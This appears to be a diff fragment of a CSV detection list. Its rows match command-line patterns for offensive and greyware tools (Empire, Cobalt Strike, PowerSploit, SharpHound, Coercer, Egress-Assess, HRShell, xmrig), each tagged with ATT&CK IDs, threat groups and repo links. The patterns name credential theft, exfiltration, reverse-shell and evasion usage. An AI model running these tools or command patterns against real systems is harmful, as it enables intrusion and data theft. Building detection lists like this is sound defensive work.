+"* -CheckShareAccess -Verbose*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"* --check-tor *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
+"* -ChildPath *fodhelper.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - 
Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* -ChildPath *sdclt.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* chimera.py *","offensive_tool_keyword","Chimera","Automated DLL Sideloading 
Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z"
+"* chimera.sh*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z"
+"* chimera_automation *.exe*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z"
+"* chrome logindata *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z"
+"* chrome masterkey *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z"
+"* chromium_based_browsers.py*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"* cics-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* cics-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* cics-user-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* cics-user-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* CIMplant.exe*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"* citrix-brute-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* citrix-enum-apps.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* citrix-enum-apps-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* citrix-enum-servers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* citrix-enum-servers-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* clamav-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -client ftp -ip * -Username * -Password * -Datatype ssn -Size * -Verbose*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"* -client http -ip * -Datatype cc -Size * -Port * -Loop * -Fast -Verbose*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"* -client icmp -ip * -Datatype ssn -Report -Verbose*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"* -client smb -ip * -Datatype *c:\*.* -Verbose*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 
- T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"* -Client SMTPOutlook -IP * -NoPing -DataType *ssn*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"* client.py -s http*:5000 --cert /*.pem*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z"
+"* clock-skew.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* Clone_Token /Process:* /Command:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"* cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z"
+"* cloudsploit*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z"
+"* cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* coap-resources.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -cobalt *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"* cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"* coerce * --dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"* coerce -u * 
-p * --listener-ip*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z"
+"* Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z"
+"* CoffeeExecuteFunction*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z"
+"* --coin *--nicehash 
*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"* collect activedirectory --*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z"
+"* --collectallproperties*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* --CollectionMethod All *ldap*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* --CollectionMethod All *--ZipFileName *.zip*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* -CollectionMethod All*loggedon*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z"
+"* -CollectionMethod LoggedOn -Verbose*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z"
+"* -CollectionMethod stealth*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* --collectionmethods ACL*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* --collectionmethods ComputerOnly*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* --collectionmethods Container*","offensive_tool_keyword","sharphound","C# Data Collector for 
BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* --collectionmethods DCOM","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
